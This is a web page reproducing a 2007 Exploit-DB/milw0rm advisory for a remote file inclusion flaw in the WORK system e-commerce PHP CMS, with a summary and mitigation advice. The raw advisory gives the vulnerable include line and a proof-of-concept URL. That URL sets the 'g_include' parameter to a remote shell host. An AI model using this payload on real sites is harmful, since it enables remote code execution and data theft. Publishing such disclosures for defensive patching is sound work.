header-logo
Suggest Exploit
vendor:
WORK system e-commerce
by:
Rodrigo Duarte
N/A
CVSS
HIGH
Inclusion Vulnerability
98
CWE
Product Name: WORK system e-commerce
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Inclusion Vulnerability in WORK system e-commerce

The WORK system e-commerce PHP application is vulnerable to an inclusion vulnerability. The vulnerable script is 'include_top.php', which is part of the content management system (CMS) for e-commerce. The vulnerability allows an attacker to include arbitrary files by manipulating the 'g_include' parameter in the URL. An example proof-of-concept (PoC) URL is provided in the text. The vulnerability can be exploited to execute malicious code or disclose sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to properly validate and sanitize user input before including any files. Additionally, it is important to implement access controls and restrict the inclusion of files to trusted sources only.
Source

Exploit-DB raw data:

#####################################################################################
Rodrigo Duarte
Wuefez[AT]2die4.com ;D

WORK system e-commerce:

WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.

Vulnerable Script:

~ include_top.php
(Other scripts of this project are also vulnerable with $g_include)

Vulnerable Code:

include ($g_include."include_logo.php");

PoC:

http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell

d0rk:

[your_creativity_here]

greetz:

Cocada, FoNSECA, maxim noob
SHiKaA, ZeUsSixSixSix, Arthurcmc
pizzer, rmeira and darkers.com.br
and for all the rest, i miss.........

EOF:

BRAZILIAN RAQUER!
MAGIC PEOPLE, VOODOO PEOPLE!

#####################################################################################

defined('G_SESSION_OR_COOKIE') or header( "Location: index.php" );
if ( !isset($g_db_prefix) ) header( "Location: index.php" );

The above isn't the correct way to block inclusions.

# milw0rm.com [2007-03-10]

Navigation

Suggest Exploit

Services By CQR